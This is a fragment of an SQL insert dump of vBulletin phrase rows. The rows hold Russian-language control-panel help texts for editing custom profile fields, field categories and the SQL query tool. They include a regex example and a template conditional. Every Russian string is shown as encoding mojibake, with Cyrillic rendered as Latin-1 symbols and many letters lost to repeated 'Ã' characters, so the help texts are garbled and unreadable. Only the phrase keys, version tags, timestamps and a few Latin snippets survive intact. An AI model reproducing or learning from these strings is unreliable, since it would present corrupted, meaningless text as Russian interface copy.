(23720, -1, 'profilefield_add_edit_maxlength_text', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ââîäèìîãî çÃà ÷åÃèÿ (äëÿ òåêñòîâûõ ïîëåé) \r\nÃòà îïöèÿ îïðåäåëÿåò, ñêîëüêî ñèìâîëîâ ìîæÃî ââåñòè ïîëüçîâà òåëþ â ýòî ïîëå. \r\n \r\nÌà êñèìà ëüÃûé ðà çìåð ââîäèìîãî çÃà ÷åÃèÿ (äëÿ ïîëåé ñ îäÃîâà ðèà ÃòÃûì âûáîðîì, ôëà æêîâ è ïåðåêëþ÷à òåëåé) \r\nÃòà îïöèÿ îïðåäåëÿåò ñêîëüêî ñèìâîëîâ ìîæåò ââåñòè ïîëüçîâà òåëü â äîïîëÃèòåëüÃîì ïîëå.', 'vbulletin', '', 0, ''),
(23721, -1, 'profilefield_add_edit_maxlength_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ââîäèìîãî çÃà ÷åÃèÿ', 'vbulletin', '', 0, ''),
(23722, -1, 'profilefield_add_edit_size_text', 'cphelptext', 'Ãà çìåð ïîëÿ (äëÿ òåêñòîâûõ ïîëåé ) \r\nÇäåñü óêà çûâà åòñÿ ðà çìåð ïîëÿ â ñèìâîëà õ. Ãòî çÃà ÷åÃèå äîëæÃî áûòü ìåÃüøå èëè ðà âÃûì ìà êñèìà ëüÃîìó êîëè÷åñòâó ñèìâîëîâ, ïîçâîëåÃÃîìó ââåñòè â ýòî ïîëå. \r\n \r\nÃà çìåð ïîëÿ (äëÿ ïîëåé ñ îäÃîâà ðèà ÃòÃûì âûáîðîì, ôëà æêîâ è ïåðåêëþ÷à òåëåé ) \r\nÃòîò ïà ðà ìåòð îïðåäåëÿåò ðà çìåð ïîëÿ äëÿ ââîäà â ñèìâîëà õ. ÃåêîìåÃäóåòñÿ, ÷òîáû ýòî çÃà ÷åÃèå áûëî ìåÃüøèì èëè ðà âÃûì ìà êñèìà ëüÃîìó êîëè÷åñòâó ñèìâîëîâ, ïîçâîëåÃÃîìó ââåñòè â ýòî ïîëå. \r\n \r\nÎãðà Ãè÷åÃèå âûáîðà (äëÿ ïîëåé ñ ìÃîãîâà ðèà ÃòÃûì âûáîðîì ) \r\nÃòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî îïöèé ìîæåò âûáðà òü ïîëüçîâà òåëü. Óêà æèòå çäåñü 0, ÷òîáû ïîëüçîâà òåëü ñìîã âûáðà òü âñå îïöèè. \r\n \r\nÎãðà Ãè÷åÃèå âûáîðà (äëÿ ôëà æêîâ ) \r\nÃòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî ôëà æêîâ ìîæåò ïîñòà âèòü ïîëüçîâà òåëü â ýòîì ïîëå. Ââåäèòå 0, ÷òîáû ïîëüçîâà òåëü ñìîã îòìåòèòü âñå îïöèè.', 'vbulletin', '', 0, ''),
(23723, -1, 'profilefield_add_edit_size_title', 'cphelptext', 'Ãà çìåð ïîëåé è îãðà Ãè÷åÃèå âûáîðà ', 'vbulletin', '', 0, ''),
(23724, -1, 'profilefield_add_edit_newtype_text', 'cphelptext', 'Âûáåðèòå òèï ïîëÿ äëÿ ýòîãî ïîëÿ ïðîôèëÿ. Ãîæà ëóéñòà , èçó÷èòå îñÃîâÃûå ñïðà âî÷Ãûå ñòà òüè, ÷òîáû áîëåå ïîäðîáÃî óçÃà òü î êà æäîì ïîëå ïðîôèëÿ.', 'vbulletin', '', 0, ''),
(23725, -1, 'profilefield_add_edit_newtype_title', 'cphelptext', 'Òèï ïîëÿ ïðîôèëÿ', 'vbulletin', '', 0, ''),
(23726, -1, 'profilefield_add_edit_height_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò êîëè÷åñòâî ñòðîê, êîòîðûå äîëæÃû áûòü äîñòóïÃû äëÿ ââîäà â òåêñòîâîì ïîëå. Ìû ðåêîìåÃäóåì óñòà Ãîâèòü çäåñü õîòÿ áû 2 äëÿ óäîáñòâà ïîëüçîâà òåëÿ. \r\nÃòî ïðèìåÃèìî òîëüêî äëÿ ìÃîãîñòðî÷Ãûõ òåêñòîâûõ ïîëåé ', 'vbulletin', 'zCarot', 1152785567, '3.6.0 Release Candidate 2'),
(23727, -1, 'profilefield_add_edit_height_title', 'cphelptext', 'Âûñîòà ìÃîãîñòðî÷Ãîãî òåêñòîâîãî ïîëÿ', 'vbulletin', '', 0, ''),
(23728, -1, 'profilefield_add_edit_def_text', 'cphelptext', 'Ãîëÿ äëÿ âûáîðà \r\nÅñëè âû æåëà åòå, ÷òîáû ïåðâà ÿ îïöèÿ ñòà ëà îïöèåé ïî óìîë÷à Ãèþ â ýòîì ïîëå, òî âûáåðèòå çäåñü \"Äà \".  ïðîòèâÃîì ñëó÷à å âûáîð ïî óìîë÷à Ãèþ áóäåò îòñóòñòâîâà òü. Ãòî ïîëåçÃî äëÿ òîãî, ÷òîáû çà ñòà âèòü ïîëüçîâà òåëåé âûáðà òü îäÃî èç çÃà ÷åÃèé ïðè ðåãèñòðà öèè, åñëè ýòî îáÿçà òåëüÃîå ïîëå. \r\n \r\nÃîëÿ äëÿ ïåðåêëþ÷à òåëåé \r\nÅñëè \"Äà \", òî ïåðâûé ïåðåêëþ÷à òåëü èçÃà ÷à ëüÃî áóäåò âûáðà Ã.  ïðîòèâÃîì ñëó÷à å ïðåäóñòà ÃîâëåÃÃîãî âûáîðà ÃÃ¥ áóäåò. Ãòî ïîëåçÃî â òîì ñëó÷à å, åñëè âû æåëà åòå, ÷òîáû ïîëüçîâà òåëü ñà ìîñòîÿòåëüÃî âûáðà ë îäèà èç ïåðåêëþ÷à òåëåé, åñëè ýòî îáÿçà òåëüÃîå ïîëå.', 'vbulletin', '', 0, ''),
(23729, -1, 'profilefield_add_edit_def_title', 'cphelptext', 'Ãî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23730, -1, 'profilefield_add_edit_perline_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî âà ðèà Ãòîâ îòîáðà æà åòñÿ Ãà îäÃîé ñòðîêå. Åñëè âû óêà æèòå çäåñü 0, òî âñå âà ðèà Ãòû áóäóò îòîáðà æåÃû Ãà îäÃîé ñòðîêå.', 'vbulletin', 'zCarot', 1199998638, '3.7.0 Beta 4'),
(23731, -1, 'profilefield_add_edit_perline_title', 'cphelptext', 'ÃëåìåÃòîâ Ãà ñòðîêó (òîëüêî äëÿ ïåðåêëþ÷à òåëåé è ôëà æêîâ )', 'vbulletin', 'zCarot', 1147805177, '3.6.0 Beta 1'),
(23732, -1, 'profilefield_add_edit_boxheight_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, êà êîé âûñîòû äîëæÃî áûòü ïîëå. Åñëè ó âà ñ 12 îïöèé, è âû æåëà åòå, ÷òîáû õîòÿ áû 3 èç Ãèõ îòîáðà æà ëèñü áåç ïîëîñû ïðîêðóòêè, òî óñòà Ãîâèòå çäåñü 3. ÃåêîìåÃäóåòñÿ óñòà Ãîâèòü çäåñü êà ê ìèÃèìóì 3, ÷òîáû ïîëüçîâà òåëÿì áûëî óäîáÃåå.', 'vbulletin', '', 0, ''),
(23733, -1, 'profilefield_add_edit_boxheight_title', 'cphelptext', 'Âûñîòà ïîëÿ (òîëüêî äëÿ ìÃîãîâà ðèà ÃòÃîãî âûáîðà )', 'vbulletin', '', 0, ''),
(23734, -1, 'profilefield_add_edit_displayorder_text', 'cphelptext', 'Çäåñü óêà çûâà åòñÿ ïîðÿäîê, â êîòîðîì áóäåò îòîáðà æà òüñÿ ïîëå. Ãî óìîë÷à Ãèþ ïîëå áóäåò äîáà âëåÃî ïîñëåäÃèì. Ãîðÿäîê îòîáðà æåÃèÿ Ãà ÷èÃà åòñÿ ñ 1 è ìîæåò áûòü ëþáûì öåëûì ïîëîæèòåëüÃûì ÷èñëîì.', 'vbulletin', '', 0, ''),
(23735, -1, 'profilefield_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(23736, -1, 'profilefield_add_edit_required_text', 'cphelptext', 'Äà , ïðè ðåãèñòðà öèè è îáÃîâëåÃèè ïðîôèëÿ - ïîëüçîâà òåëü äîëæåà áóäåò çà ïîëÃèòü ýòî ïîëå ïðè ðåãèñòðà öèè è ëþáîì îáÃîâëåÃèè ïðîôèëÿ. \r\n \r\nÄà , âñåãäà - ïîëüçîâà òåëü äîëæåà áóäåò çà ïîëÃèòü ýòî ïîëå ïðè ðåãèñòðà öèè. Åñëè âûáðà à ýòîò âà ðèà Ãò, òî óæå çà ðåãèñòðèðîâà ÃÃûå ïîëüçîâà òåëè îáÿçà Ãû áóäóò çà ïîëÃèòü äà ÃÃîå ïîëå, ïåðåä òåì êà ê ïðîäîëæèòü èñïîëüçîâà òü âà ø ôîðóì. Ãòî çÃà ÷åÃèå áóäåò ïðèìåÃÿòüñÿ, òîëüêî åñëè ïîëå áóäåò îòîáðà æà òüñÿ Ãà ñòðà Ãèöå \"Ãåäà êòèðîâà òü äà ÃÃûå\". \r\n \r\nÃåò - çà ïîëÃÃ¥Ãèå äà ÃÃîãî ïîëÿ ÃÃ¥ îáÿçà òåëüÃî. \r\n \r\nÃåò, Ãî ïîêà çûâà òü ïðè ðåãèñòðà öèè - çà ïîëÃÃ¥Ãèå äà ÃÃîãî ïîëÿ ÃÃ¥ îáÿçà òåëüÃî, Ãî îÃî áóäåò îòîáðà æà òüñÿ ïðè ðåãèñòðà öèè.', 'vbulletin', 'zCarot', 1214221606, '3.8.0 Alpha 1'),
(23737, -1, 'profilefield_add_edit_required_title', 'cphelptext', 'Îáÿçà òåëüÃîå ïîëå', 'vbulletin', '', 0, ''),
(23738, -1, 'profilefield_add_edit_editable_text', 'cphelptext', 'Äà - ïîëüçîâà òåëü ñìîæåò îòðåäà êòèðîâà òü äà ÃÃîå ïîëå â ëþáîå âðåìÿ. \r\n \r\nÃåò - ïîëüçîâà òåëü ÃÃ¥ ñìîæåò îòðåäà êòèðîâà òü ýòî ïîëå. \r\n \r\nÒîëüêî ïðè ðåãèñòðà öèè - ïîëüçîâà òåëü ñìîæåò îòðåäà êòèðîâà òü ýòî ïîëå òîëüêî ïðè ðåãèñòðà öèè èëè åñëè îÃî òðåáóåò çà ïîëÃÃ¥Ãèÿ è ïðè ýòîì åù¸ ÃÃ¥ çà ïîëÃÃ¥Ãî.', 'vbulletin', 'zCarot', 1147803250, '3.6.0 Beta 1'),
(23739, -1, 'profilefield_add_edit_editable_title', 'cphelptext', 'ÄîñòóïÃî äëÿ ðåäà êòèðîâà Ãèÿ ïîëüçîâà òåëåì', 'vbulletin', '', 0, ''),
(23740, -1, 'profilefield_add_edit_hidden_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëå ìîæåò áûòü çà ïîëÃÃ¥Ãî ïîëüçîâà òåëåì, Ãî âèäèìî îÃî áóäåò òîëüêî òåì, ó êîãî åñòü ïðà âà Ãà óðîâÃÃ¥ ãðóïïû ïîëüçîâà òåëåé Ãà ïðîñìîòð ëè÷Ãûõ ïîëåé.', 'vbulletin', '', 0, ''),
(23741, -1, 'profilefield_add_edit_hidden_title', 'cphelptext', 'Ëè÷Ãîå ïîëå', 'vbulletin', '', 0, ''),
(23742, -1, 'profilefield_add_edit_searchable_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò âûïîëÃÿòü ðà ñøèðåÃÃûé ïîèñê ïî ýòîìó ïîëþ â ñïèñêå ó÷à ñòÃèêîâ. Åñëè âû óêà çà ëè, ÷òî ïîëå ëè÷Ãîå, òî òîëüêî ïîëüçîâà òåëè ñ ïðà âà ìè Ãà óðîâÃÃ¥ ãðóïïû ñìîãóò èñêà òü åãî.', 'vbulletin', '', 0, ''),
(23743, -1, 'profilefield_add_edit_searchable_title', 'cphelptext', 'Ãîëå äîñòóïÃî äëÿ ïîèñêà ïî ñïèñêó ó÷à ñòÃèêîâ', 'vbulletin', '', 0, ''),
(23744, -1, 'profilefield_add_edit_memberlist_text', 'cphelptext', 'Åñëè \"Äà \", òî çÃà ÷åÃèå ïîëÿ áóäåò îòîáðà æà òüñÿ â ñïèñêå ó÷à ñòÃèêîâ ó êà æäîãî ïîëüçîâà òåëÿ. Åñëè âû óêà çà ëè, ÷òî ïîëå ñêðûòî, òî òîëüêî à äìèÃèñòðà òîðû è ìîäåðà òîðû ñìîãóò óâèäåòü çÃà ÷åÃèå ýòîãî ïîëÿ â ñïèñêå ó÷à ñòÃèêîâ.', 'vbulletin', '', 0, ''),
(23745, -1, 'profilefield_add_edit_memberlist_title', 'cphelptext', 'Îòîáðà æà òü â ñïèñêå ó÷à ñòÃèêîâ?', 'vbulletin', '', 0, ''),
(23746, -1, 'profilefield_add_edit_optional_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëþ áóäåò ðà çðåøåÃî çà ïîëÃèòü òåêñòîâîå ïîëå, êà ê à ëüòåðÃà òèâÃûé âà ðèà Ãò îïöèÿì, óêà çà ÃÃûì äëÿ ýòîãî ïîëÿ.', 'vbulletin', '', 0, ''),
(23747, -1, 'profilefield_add_edit_optional_title', 'cphelptext', 'Ãà çðåøèòü äîïîëÃèòåëüÃûå ïîëÿ (òîëüêî äëÿ ïîëåé âûáîðà è ïåðåêëþ÷à òåëåé )', 'vbulletin', '', 0, ''),
(23748, -1, 'profilefield_add_edit_regex_text', 'cphelptext', 'Âû ìîæåòå òðåáîâà òü, ÷òîáû çÃà ÷åÃèå ïîëÿ ñîîòâåòñòâîâà ëî ðåãóëÿðÃîìó âûðà æåÃèþ PCRE-òèïà . Ãà ïðèìåð, ïîëå ñîäåðæèò Ãîìåð ICQ ïîëüçîâà òåëÿ. Òà ê êà ê Ãîìåðà ICQ ñîäåðæà ò òîëüêî ÷èñëà , òî âà ì ñëåäóåò çà ïèñà òü ðåãóëÿðÃîå âûðà æåÃèå Ãà ïðîâåðêó ââîäà ÃÃ¥ ÷èñåë.\r\n \r\nÃà ïðèìåð (ÃÃ¥ Ãà ÷èÃà éòå è ÃÃ¥ çà êà Ã÷èâà éòå âûðà æåÃèå ñèìâîëîì ïåðåõîäà ) : \r\n \r\n^[0-9]{7,8}$ \r\n \r\nÅñëè âû äîïóñêà åòå, ÷òî ïîëå ìîæåò áûòü ïóñòûì, òî âà ì ñëåäóåò èñïîëüçîâà òü: \r\n \r\n^[0-9]{7,8}$|^$ \r\n \r\nÑì. PHP.net äëÿ ïîèñêà áîëüøåé èÃôîðìà öèè î ðåãóëÿðÃûõ âûðà æåÃèÿõ.', 'vbulletin', 'zCarot', 1161192426, '3.6.3'),
(23749, -1, 'profilefield_add_edit_regex_title', 'cphelptext', 'ÃåãóëÿðÃîå âûðà æåÃèå (òîëüêî äëÿ ïîëåé âûáîðà , òåêñòîâûõ ïîëåé è ïåðåêëþ÷à òåëåé )', 'vbulletin', '', 0, ''),
(23750, -1, 'profilefield_add_edit_form_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, Ãà êà êîé ñòðà Ãèöå áóäåò îòîáðà æà òüñÿ ïîëå ïðîôèëÿ.  áîëüøèÃñòâå ñëó÷à åâ âû ïîæåëà åòå îñòà âèòü çäåñü \"Ãåäà êòèðîâà òü äà ÃÃûå\", Ãî âû òà êæå ìîæåòå ïîæåëà òü ñîçäà òü ñîáñòâåÃÃûå îïöèè, êîòîðûìè ìîæÃî áóäåò óïðà âëÿòü ÷åðåç óñëîâèÿ â øà áëîÃà õ, òîãäà âûáåðèòå \"Îïöèè\". Ãòî ïîëå ïîÿâèòñÿ Ãà ñòðà Ãèöå \"Îïöèè\" ïà Ãåëè ïîëüçîâà òåëÿ. Òà êæå ýòî ïîëå ÃÃ¥ áóäåò ïîÿâëÿòüñÿ ïðè ïðîñìîòðå ïðîôèëÿ ïîëüçîâà òåëÿ. \r\n\r\nÊà ê óæå óïîìèÃà ëîñü, âû ìîæåòå èñïîëüçîâà òü óñëîâèÿ â øà áëîÃà õ, ÷òîáû äîáà âèòü äîïîëÃèòåëüÃûå îïöèè äëÿ âà øèõ ïîëüçîâà òåëåé. Ãà ïðèìåð, âû ìîæåòå ñäåëà òü ýòî ïîëå ïðîôèëÿ ïîëåì âûáîðà èç îäÃîãî ýëåìåÃòà ïîä îäÃîé èç êà òåãîðèé îïöèé. Çà òåì âû ìîæåòå èñïîëüçîâà òü ýòî ïîëå êà ê óñëîâèå îòîáðà æåÃèÿ ÷åãî-Ãèáóäü â øà áëîÃÃ¥ ÷à ñòåé ñîîáùåÃèé. Åñëè \"Ãà çâà Ãèå\" ýòîãî ïîëÿ ïðîôèëÿ field1, òî âû ìîæåòå èñïîëüçîâà òü ýòîò êîä â ñâîèõ øà áëîÃà õ: \r\n\r\n<if condition=\"$post[\'field1\']\"> \r\nêîä îòîáðà æåÃèÿ, åñëè ïîëüçîâà òåëü îòìåòèë ýòî ïîëå ïðîôèëÿ \r\n</if> \r\n\r\nÊîä â ñåðåäèÃÃ¥ green îòîáðà çèòñÿ, òîëüêî åñëè ïîëüçîâà òåëü îòìåòèë ñîîòâåòñòâóþùåå ïîëå ïðîôèëÿ â ñâîèõ îïöèÿõ.', 'vbulletin', 'zCarot', 1201688570, '3.7.0 Beta 5'),
(23751, -1, 'profilefield_add_edit_form_title', 'cphelptext', 'Ñòðà Ãèöà , îòîáðà æà åìà ÿ ýòó îïöèþ', 'vbulletin', '', 0, ''),
(23752, -1, 'profilefield_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå îòðåäà êòèðîâà òü îäÃî èç ïîëåé ïðîôèëÿ ïîëüçîâà òåëÿ. Ãîëå ïðîôèëÿ ïîëüçîâà òåëÿ - ýòî ïîëå, êîòîðîå çà ïîëÃÿåò ïîëüçîâà òåëü ïðè ðåãèñòðà öèè (èëè ïîñëå, ïðè ðåäà êòèðîâà Ãèè ïðîôèëÿ), à çà òåì çÃà ÷åÃèå îòîáðà æà åòñÿ â ðà çëè÷Ãûõ ìåñòà õ.', 'vbulletin', '', 0, ''),
(23753, -1, 'profilefield_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïîëåé ïðîôèëÿ', 'vbulletin', '', 0, ''),
(23754, -1, 'profilefield_editcat_text', 'cphelptext', 'Âû ìîæåòå ãðóïïèðîâà òü äîïîëÃèòåëüÃûå ïîëÿ ïðîôèëÿ ïî êà òåãîðèÿì. ÎñÃîâÃà ÿ öåëü ãðóïïèðîâêè - îòîáðà æåÃèå ïóÃêòîâ â ðà çÃûõ âêëà äêà õ èëè áëîêà õ â ïðîôèëå (â äîïîëÃÃ¥Ãèè ê îòîáðà æåÃèþ âî âêëà äêå \"Îáî ìÃÃ¥\").', 'vbulletin', 'zCarot', 1205936925, '3.7.0 Release Candidate 1'),
(23755, -1, 'profilefield_editcat_title', 'cphelptext', 'Óïðà âëåÃèå êà òåãîðèÿìè äîïîëÃèòåëüÃûõ ïîëåé ïðîôèëÿ', 'vbulletin', 'zCarot', 1205936925, '3.7.0 Release Candidate 1'),
(23756, -1, 'profilefield_editcat_allowprivacy_text', 'cphelptext', 'Îïðåäåëÿåò, ïîÿâèòñÿ ëè ýòà êà òåãîðèÿ Ãà ñòðà Ãèöå Ãà ñòðîåê êîÃôèäåÃöèà ëüÃîñòè ïðîôèëÿ, ïîçâîëÿÿ ñêðûòü ýòó êà òåãîðèþ îò äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1215167628, '3.8.0 Alpha 1'),
(23757, -1, 'profilefield_editcat_allowprivacy_title', 'cphelptext', 'Ãà çðåøèòü Ãà ñòðîéêè êîÃôèäåÃöèà ëüÃîñòè', 'vbulletin', 'zCarot', 1218102521, '3.8.0 Alpha 1'),
(23758, -1, 'profilefield_editcat_title_text', 'cphelptext', 'Ââåäèòå çà ãîëîâîê êà òåãîðèè äîïîëÃèòåëüÃûõ ïîëåé ïðîôèëÿ. Ãòîò çà ãîëîâîê áóäåò îòîáðà æà òüñÿ ïîëüçîâà òåëÿì. ÃÃ¥ èñïîëüçóéòå HTML êîä.', 'vbulletin', 'zCarot', 1205936976, '3.7.0 Release Candidate 1'),
(23759, -1, 'profilefield_editcat_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1205936976, '3.7.0 Release Candidate 1'),
(23760, -1, 'profilefield_editcat_desc_text', 'cphelptext', 'Ââåäèòå îïèñà Ãèå êà òåãîðèè äîïîëÃèòåëüÃûõ ïîëåé ïðîôèëÿ. Ãòà èÃôîðìà öèÿ áóäåò îòîáðà æåÃà ïîä Ãà çâà Ãèåì êà òåãîðèè âî âêëà äêå ïðîôèëÿ \"Îáî ìÃÃ¥\".', 'vbulletin', 'zCarot', 1205937083, '3.7.0 Release Candidate 1'),
(23761, -1, 'profilefield_editcat_desc_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', 'zCarot', 1205937083, '3.7.0 Release Candidate 1'),
(23762, -1, 'profilefield_editcat_location_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò óêà çà òü ìåñòà â ïðîôèëå, Ãà êîòîðûõ áóäóò îòîáðà æà òüñÿ äîïîëÃèòåëüÃûå ïîëÿ ýòîé êà òåãîðèè.
\r\n\r\nÂû ìîæåòå âûáðà òü èç Ãåñêîëüêèõ âà ðèà Ãòîâ, òà êèõ êà ê îòîáðà æåÃèå â âèäå Ãîâîé âêëà äêè, ëèáî â êîëîÃêå ðÿäîì ñ âêëà äêà ìè.
', 'vbulletin', 'zCarot', 1205937185, '3.7.0 Release Candidate 1'),
(23763, -1, 'profilefield_editcat_location_title', 'cphelptext', 'ÌåñòîïîëîæåÃèå â ïðîôèëå', 'vbulletin', 'zCarot', 1205937185, '3.7.0 Release Candidate 1'),
(23764, -1, 'profilefield_editcat_displayorder_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ìåñòîïîëîæåÃèå ýòîé êà òåãîðèè, îòÃîñèòåëüÃî äðóãèõ. Êà òåãîðèè ñ áîëåå âûñîêèì ïîðÿäêîì îòîáðà æåÃèÿ áóäóò Ãà õîäèòüñÿ ïåðåä êà òåãîðèÿìè ñ áîëåå Ãèçêèì ïîðÿäêîì îòîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1205937243, '3.7.0 Release Candidate 1'),
(23765, -1, 'profilefield_editcat_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1205937243, '3.7.0 Release Candidate 1'),
(23766, -1, 'profilefield_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óïðà âëÿòü âà øèìè ïîëÿìè ïðîôèëåé ïîëüçîâà òåëåé. Ãîëÿ ïðîôèëåé ïîëüçîâà òåëåé ñîäåðæà ò â ñåáå èÃôîðìà öèþ è Ãà ñòðîéêè âà øèõ ïîëüçîâà òåëåé. \r\n\r\nÃà æìèòå Ãà ññûëêó \"Ãåäà êòèðîâà òü\", ÷òîáû îòðåäà êòèðîâà òü Ãà ñòðîéêè ñîîòâåòñòâóþùåãî ïîëÿ ïðîôèëÿ. Ãà æìèòå Ãà ññûëêó \"Óäà ëèòü\" äëÿ óäà ëåÃèÿ ïîëÿ ïðîôèëÿ (òà êæå óäà ëèòñÿ ââåä¸ÃÃà ÿ ïîëüçîâà òåëÿìè èÃôîðìà öèÿ). \r\n\r\nÃîëÿ ïðîôèëÿ ïîëüçîâà òåëåé îòîáðà æà þòñÿ âìåñòå ñ ñîîáùåÃèÿìè, ðÿäîì ñ èìåÃåì à âòîðà . Åñëè âû æåëà åòå îòîáðà æà òü ïîëÿ ïðîôèëÿ â ñîîáùåÃèÿõ, òî âà ì ñëåäóåò îòðåäà êòèðîâà òü âà ø øà áëîà postbit èëè postbit_legacy (â çà âèñèìîñòè îò âûáîðà âåðòèêà ëüÃîãî èëè ãîðèçîÃòà ëüÃîãî îòîáðà æåÃèÿ â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ ) è äîáà âèòü $post[fieldX] , ãäå X - ID ïîëÿ ïðîôèëÿ, îòîáðà æà åìîãî â êîëîÃêå \"Èìÿ\" Ãà ýòîé ñòðà Ãèöå. \r\n\r\nÃèæå Ãà õîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ïîëåé ïðîôèëÿ. ÊîëîÃêà \"Çà ãîëîâîê / Òèï ïîëÿ ïðîôèëÿ\" ñîîáùèò âà ì î Ãà çâà Ãèè è òèïå ïîëÿ ïðîôèëÿ. Ãîæà ëóéñòà , èçó÷èòå îñÃîâÃûå ñïðà âî÷Ãûå ñòà òüè, ÷òîáû áîëåå ïîäðîáÃî óçÃà òü î êà æäîì èç òèïîâ ïîëåé ïðîôèëÿ. \r\n\r\nÊîëîÃêà \"Îïöèè\" ñîäåðæèò â ñåáå îïöèè, âêëþ÷¸ÃÃûå äëÿ ñîîòâåòñòâóþùåãî ïîëÿ. Ãîëÿ ïðîôèëÿ ìîãóò áûòü îáÿçà òåëüÃûìè, ðåäà êòèðóåìûìè, ëè÷Ãûìè, äîñòóïÃûìè äëÿ ïîèñêà è îòîáðà æà åìûìè â ñïèñêå ó÷à ñòÃèêîâ , à ìîãóò è ÃÃ¥ áûòü ;) . \r\n\r\nÊîëîÃêà \"Ãà çâà Ãèå\" ñîäåðæèò Ãîìåð ñîîòâåòñòâóþùåãî ïîëÿ. Âû ìîæåòå èñïîëüçîâà òü Ãîìåð ïîëÿ ïðîôèëÿ, ÷òîáû îòîáðà æà òü èõ â ñîîáùåÃèÿõ (ñì. âûøå). \r\n\r\nÊîëîÃêà \"Ãîðÿäîê îòîáðà æåÃèÿ\" ñîäåðæèò â ñåáå ïîðÿäîê îòîáðà æåÃèÿ ñîîòâåòñòâóþùåãî ïîëÿ ïðîôèëÿ. Ãîðÿäêè îòîáðà æåÃèÿ èñïîëüçóþòñÿ äëÿ ñîðòèðîâêè ïîëåé ïðîôèëÿ Ãà ðà çÃîîáðà çÃûõ ñòðà Ãèöà õ êà áèÃåòà . Âû ìîæåòå èçìåÃèòü ïîðÿäîê îòîáðà æåÃèÿ, ðåäà êòèðóÿ çÃà ÷åÃèÿ ñîîòâåòñòâóþùèõ ïîëåé è Ãà æà â Ãà êÃîïêó \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\". ', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23767, -1, 'profilefield_modify_title', 'cphelptext', 'Óïðà âëåÃèå äîïîëÃèòåëüÃûìè ïîëÿìè ïðîôèëÿ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23768, -1, 'profilefield_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü ýòî ïîëå ïðîôèëÿ. Óäà ëèâ ïîëå ïðîôèëÿ, âû ïîòåðÿåòå âñþ èÃôîðìà öèþ â ýòîì ïîëå. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ. Âîññòà ÃîâëåÃèå ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(23769, -1, 'profilefield_remove_title', 'cphelptext', 'Óäà ëèòü ïîëå ïðîôèëÿ', 'vbulletin', '', 0, ''),
(23770, -1, 'queries_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ \r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ \r\nÄèà ãÃîñòèêà \r\nÂûïîëÃÃ¥Ãèå SQL çà ïðîñà \r\n\r\nÂûïîëÃÃ¥Ãèå SQL çà ïðîñà : \r\nÃà ýòîé ñòðà Ãèöå âû ìîæåòå âûïîëÃèòü çà ïðîñû ê âà øåé áà çå äà ÃÃûõ ôîðóìà . Ãòî ìîæåò áûòü ïîëåçÃî äëÿ ìà ññîâîãî îáÃîâëåÃèÿ çà ïèñåé â âà øåé áà çå äà ÃÃûõ. Âà ì ñëåäóåò âñåãäà äåëà òü ðåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ äî âûïîëÃÃ¥Ãèÿ çà ïðîñà ê Ãåé. Ëþáîé ïðà âèëüÃûé çà ïðîñ MySQL ìîæåò áûòü âûïîëÃåà çäåñü. Ñì. mysql.com äëÿ ïîëó÷åÃèÿ áîëåå ïîäðîáÃîé èÃôîðìà öèè îá ýòîì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23771, -1, 'queries_title', 'cphelptext', 'ÃŽ âûïîëÃÃ¥Ãèè SQL çà ïðîñà ', 'vbulletin', '', 0, ''),
(23772, -1, 'queries_modify_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì âûïîëÃÿòü çà ïðîñû ê âà øåé áà çå äà ÃÃûõ. Âà ì ñëåäóåò ñäåëà òü ðåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ äî âûïîëÃÃ¥Ãèÿ çà ïðîñà ê Ãåé.', 'vbulletin', '', 0, ''),
(23773, -1, 'queries_modify_title', 'cphelptext', 'ÂûïîëÃèòü SQL çà ïðîñ', 'vbulletin', '', 0, ''),
